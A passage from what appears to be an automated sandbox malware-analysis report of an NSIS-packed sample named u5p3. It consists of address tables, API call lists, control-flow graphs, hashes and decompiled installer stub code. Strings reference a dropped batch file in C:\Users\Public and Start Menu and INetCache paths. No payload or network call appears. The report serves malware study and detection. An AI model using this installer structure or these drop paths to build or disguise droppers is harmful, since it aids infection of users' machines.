                                                        0x00404122
                                                        0x0040413b
                                                        0x00404141
                                                        0x00404145
                                                        0x0040414a
                                                        0x00404150
                                                        0x00000000
                                                        0x00000000
                                                        0x0040415a
                                                        0x00404165
                                                        0x00000000
                                                        0x00404165
                                                        0x0040408f
                                                        0x00404095
                                                        0x00000000
                                                        0x00000000
                                                        0x0040409b
                                                        0x004040a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004040a7
                                                        0x0040407b
                                                        0x00404172
                                                        0x0040417e
                                                        0x00404185
                                                        0x00000000
                                                        0x00403ed0
                                                        0x00403ed0
                                                        0x00403ed3
                                                        0x00403f06
                                                        0x00403f06
                                                        0x00403f08
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f08
                                                        0x00403ed5
                                                        0x00403ed9
                                                        0x00403ede
                                                        0x00403ee0
                                                        0x00000000
                                                        0x00000000
                                                        0x00403ef0
                                                        0x00403ef8
                                                        0x00000000
                                                        0x00403efe
                                                        0x00403d2c
                                                        0x00403d2c
                                                        0x00403d30
                                                        0x00403d35
                                                        0x00403d44
                                                        0x00403d44
                                                        0x00403d4d
                                                        0x00403d56
                                                        0x00403d61
                                                        0x00403d61
                                                        0x00403d6d
                                                        0x00403d89
                                                        0x00403d8c
                                                        0x00403d9f
                                                        0x00403da5
                                                        0x00403e48
                                                        0x00000000
                                                        0x00403e51
                                                        0x00403dab
                                                        0x00403db8
                                                        0x00403dba
                                                        0x00403dbc
                                                        0x00403ddb
                                                        0x00403ddb
                                                        0x00403dde
                                                        0x00403de3
                                                        0x00403de6
                                                        0x00403df6
                                                        0x00403df7
                                                        0x00403df9
                                                        0x00403e2f
                                                        0x00403e42
                                                        0x00000000
                                                        0x00403e42
                                                        0x00403dfb
                                                        0x00403e01
                                                        0x00403e1a
                                                        0x00403e1f
                                                        0x00403e21
                                                        0x00000000
                                                        0x00000000
                                                        0x00403e23
                                                        0x00403e0f
                                                        0x00403e0f
                                                        0x00403e11
                                                        0x00403e11
                                                        0x00000000
                                                        0x00403e11
                                                        0x00403e04
                                                        0x00403e09
                                                        0x00000000
                                                        0x00403e09
                                                        0x00403de8
                                                        0x00403dee
                                                        0x00000000
                                                        0x00000000
                                                        0x00403df0
                                                        0x00000000
                                                        0x00403df0
                                                        0x00403de0
                                                        0x00000000
                                                        0x00403de0
                                                        0x00403dc6
                                                        0x00403dcd
                                                        0x00403dd3
                                                        0x00403dd5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403dd5
                                                        0x00403d91
                                                        0x00000000
                                                        0x00403d6f
                                                        0x00403d75
                                                        0x00403d7f
                                                        0x0040418b
                                                        0x0040418b
                                                        0x00404191
                                                        0x0040419e
                                                        0x004041a4
                                                        0x004041a4
                                                        0x004041ae
                                                        0x00000000
                                                        0x004041ae
                                                        0x00403d6d

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                        • ShowWindow.USER32(?), ref: 00403D61
                                                        • DestroyWindow.USER32 ref: 00403D75
                                                        • SetWindowLongW.USER32 ref: 00403D91
                                                        • GetDlgItem.USER32 ref: 00403DB2
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                        • GetDlgItem.USER32 ref: 00403E7B
                                                        • GetDlgItem.USER32 ref: 00403E85
                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00403E9F
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                        • GetDlgItem.USER32 ref: 00403F96
                                                        • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                        • EnableWindow.USER32(?,?), ref: 00403FE4
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                                        • EnableMenuItem.USER32 ref: 00404001
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                        • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                        • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                                        • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                        • String ID: 6B
                                                        • API String ID: 3906175533-4127139157
                                                        • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                        • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                        • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                        • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a34 call 40611a 314->316 319 403a39-403a42 316->319 319->313 322 403a44-403a48 319->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                                        C-Code - Quality: 96%
                                                        			E0040395A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a214;
				_t22 = E00406626(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x4236e8;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E0040611A(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x4236e8, 0);
					__eflags =  *0x4236e8;
					if(__eflags == 0) {
						E0040611A(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x4236e8, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406193(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403C30(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth";
				 *0x42a2a0 =  *0x42a21c & 0x00000020;
				 *0x42a2bc = 0x10000;
				if(E00405C25(_t90, L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") != 0) {
					L16:
					if(E00405C25(_t98, _t86) == 0) {
						E0040626E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a200, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x4291e8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C30(_t78, __eflags);
							__eflags =  *0x42a2c0;
							if( *0x42a2c0 != 0) {
								_t33 = E00405383(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x4291cc;
								if( *0x4291cc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x4236c8, 5); // executed
							_t39 = E004065B6("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065B6("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291a0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291a0);
								 *0x4291c4 = _t87;
								RegisterClassW(0x4291a0);
							}
							_t44 = DialogBoxParamW( *0x42a200,  *0x4291e0 + 0x00000069 & 0x0000ffff, 0, E00403D08, 0); // executed
							E004038AA(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a200;
						 *0x4291a4 = E00401000;
						 *0x4291b0 =  *0x42a200;
						 *0x4291b4 = _t30;
						 *0x4291c4 = 0x40a380;
						if(RegisterClassW(0x4291a0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x4236c8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a200, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x4281a0;
					E0040611A(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281a0, 0);
					_t63 =  *0x4281a0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281a2;
						 *((short*)(E00405B4A(0x4281a2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040624C(_t86, E00405B1D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B69(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                        0x00403960
                                                        0x00403969
                                                        0x00403970
                                                        0x00403972
                                                        0x00403986
                                                        0x00403998
                                                        0x004039a1
                                                        0x004039aa
                                                        0x004039b1
                                                        0x004039b6
                                                        0x004039bd
                                                        0x004039d0
                                                        0x004039d0
                                                        0x004039db
                                                        0x00403974
                                                        0x0040397f
                                                        0x0040397f
                                                        0x004039e0
                                                        0x004039ea
                                                        0x004039f3
                                                        0x004039f8
                                                        0x00403a09
                                                        0x00403a9b
                                                        0x00403aa3
                                                        0x00403aac
                                                        0x00403aac
                                                        0x00403ac2
                                                        0x00403ac8
                                                        0x00403ad6
                                                        0x00403b57
                                                        0x00403b5f
                                                        0x00403b69
                                                        0x00403b6e
                                                        0x00403b74
                                                        0x00403bfe
                                                        0x00403c03
                                                        0x00403c05
                                                        0x00403c21
                                                        0x00000000
                                                        0x00403c21
                                                        0x00403c07
                                                        0x00403c0d
                                                        0x00403c15
                                                        0x00403c15
                                                        0x00000000
                                                        0x00403c0d
                                                        0x00403b82
                                                        0x00403b8d
                                                        0x00403b92
                                                        0x00403b94
                                                        0x00403b9b
                                                        0x00403b9b
                                                        0x00403ba6
                                                        0x00403bae
                                                        0x00403bb0
                                                        0x00403bb2
                                                        0x00403bbb
                                                        0x00403bbe
                                                        0x00403bc4
                                                        0x00403bc4
                                                        0x00403be3
                                                        0x00403bf4
                                                        0x00000000
                                                        0x00403bf9
                                                        0x00403b61
                                                        0x00403b63
                                                        0x00000000
                                                        0x00403ad8
                                                        0x00403ad8
                                                        0x00403ae4
                                                        0x00403aee
                                                        0x00403af4
                                                        0x00403af9
                                                        0x00403b08
                                                        0x00403c26
                                                        0x00403c26
                                                        0x00000000
                                                        0x00403c26
                                                        0x00403b17
                                                        0x00403b52
                                                        0x00000000
                                                        0x00403b52
                                                        0x00403a0f
                                                        0x00403a0f
                                                        0x00403a12
                                                        0x00403a14
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a22
                                                        0x00403a34
                                                        0x00403a39
                                                        0x00403a42
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a48
                                                        0x00403a4a
                                                        0x00403a57
                                                        0x00403a57
                                                        0x00403a60
                                                        0x00403a66
                                                        0x00403a8e
                                                        0x00403a96
                                                        0x00000000
                                                        0x00403a78
                                                        0x00403a79
                                                        0x00403a82
                                                        0x00403a88
                                                        0x00403a89
                                                        0x00000000
                                                        0x00403a89
                                                        0x00403a84
                                                        0x00403a86
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a86
                                                        0x00403a66

                                                        APIs
                                                          • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                          • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                        • lstrcatW.KERNEL32(1033,004236E8), ref: 004039DB
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00403A79
                                                        • LoadImageW.USER32 ref: 00403AC2
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        • RegisterClassW.USER32 ref: 00403AFF
                                                        • SystemParametersInfoW.USER32 ref: 00403B17
                                                        • CreateWindowExW.USER32 ref: 00403B4C
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                        • GetClassInfoW.USER32 ref: 00403BAE
                                                        • GetClassInfoW.USER32 ref: 00403BBB
                                                        • RegisterClassW.USER32 ref: 00403BC4
                                                        • DialogBoxParamW.USER32 ref: 00403BE3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\Public\u5p3.bat" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                        • API String ID: 1975747703-760492975
                                                        • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                        • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                        • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                        • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402EC1 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                        C-Code - Quality: 80%
                                                        			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x42a210 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x438800, 0x400);
				_t89 = E00405D3E(0x438800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Public";
				E0040624C(L"C:\\Users\\Public", 0x438800);
				E0040624C(0x439000, E00405B69(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x418ea4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x42a218 - _t82;
					if( *0x42a218 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004032F5( *0x42a218 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42a214 = _t94;
							 *0x42a21c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a220 =  *0x42a220 + 1;
								__eflags =  *0x42a220;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405CF9(0x42a240, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004032F5( *0x40ce98);
					_t65 = E004032DF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a218) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032DF(0x418ea8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a218;
						if( *0x42a218 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405CF9( &_v44, 0x418ea8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40ce98; // 0x54265
						 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42a218 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x418ea4; // 0x54269
						if(__eflags < 0) {
							_v12 = E00406719(_v12, 0x418ea8, _t90);
						}
						 *0x40ce98 =  *0x40ce98 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                        0x00402ec9
                                                        0x00402ecc
                                                        0x00402ecf
                                                        0x00402ee9
                                                        0x00402eee
                                                        0x00402f01
                                                        0x00402f06
                                                        0x00402f09
                                                        0x00402f0f
                                                        0x00000000
                                                        0x00402f11
                                                        0x00402f1c
                                                        0x00402f22
                                                        0x00402f33
                                                        0x00402f3a
                                                        0x00402f40
                                                        0x00402f42
                                                        0x00402f47
                                                        0x00402f49
                                                        0x00403036
                                                        0x00403038
                                                        0x0040303d
                                                        0x00403044
                                                        0x00000000
                                                        0x00000000
                                                        0x00403046
                                                        0x00403049
                                                        0x0040306d
                                                        0x00403072
                                                        0x00403078
                                                        0x00403083
                                                        0x00403088
                                                        0x0040308b
                                                        0x0040308c
                                                        0x0040308d
                                                        0x0040308f
                                                        0x00403094
                                                        0x00403097
                                                        0x004030aa
                                                        0x004030ae
                                                        0x004030b6
                                                        0x004030bb
                                                        0x004030bd
                                                        0x004030bd
                                                        0x004030bd
                                                        0x004030c5
                                                        0x004030c5
                                                        0x004030c8
                                                        0x004030c9
                                                        0x004030c9
                                                        0x004030cc
                                                        0x004030ce
                                                        0x004030ce
                                                        0x004030ce
                                                        0x004030d8
                                                        0x004030de
                                                        0x004030ec
                                                        0x004030f1
                                                        0x00000000
                                                        0x004030f1
                                                        0x00000000
                                                        0x00403097
                                                        0x00403051
                                                        0x0040305c
                                                        0x00403061
                                                        0x00403063
                                                        0x00000000
                                                        0x00000000
                                                        0x00403068
                                                        0x0040306b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f4f
                                                        0x00402f54
                                                        0x00402f59
                                                        0x00402f5d
                                                        0x00402f64
                                                        0x00402f69
                                                        0x00402f6b
                                                        0x00402f6d
                                                        0x00402f6d
                                                        0x00402f71
                                                        0x00402f76
                                                        0x00402f78
                                                        0x004030a2
                                                        0x00403099
                                                        0x00000000
                                                        0x00403099
                                                        0x00402f7e
                                                        0x00402f85
                                                        0x00403001
                                                        0x00403005
                                                        0x00403009
                                                        0x0040300e
                                                        0x00000000
                                                        0x00403005
                                                        0x00402f8e
                                                        0x00402f93
                                                        0x00402f96
                                                        0x00402f9b
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f9d
                                                        0x00402fa4
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fa6
                                                        0x00402fad
                                                        0x00000000
                                                        0x00000000
                                                        0x00402faf
                                                        0x00402fb6
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fb8
                                                        0x00402fbf
                                                        0x00000000
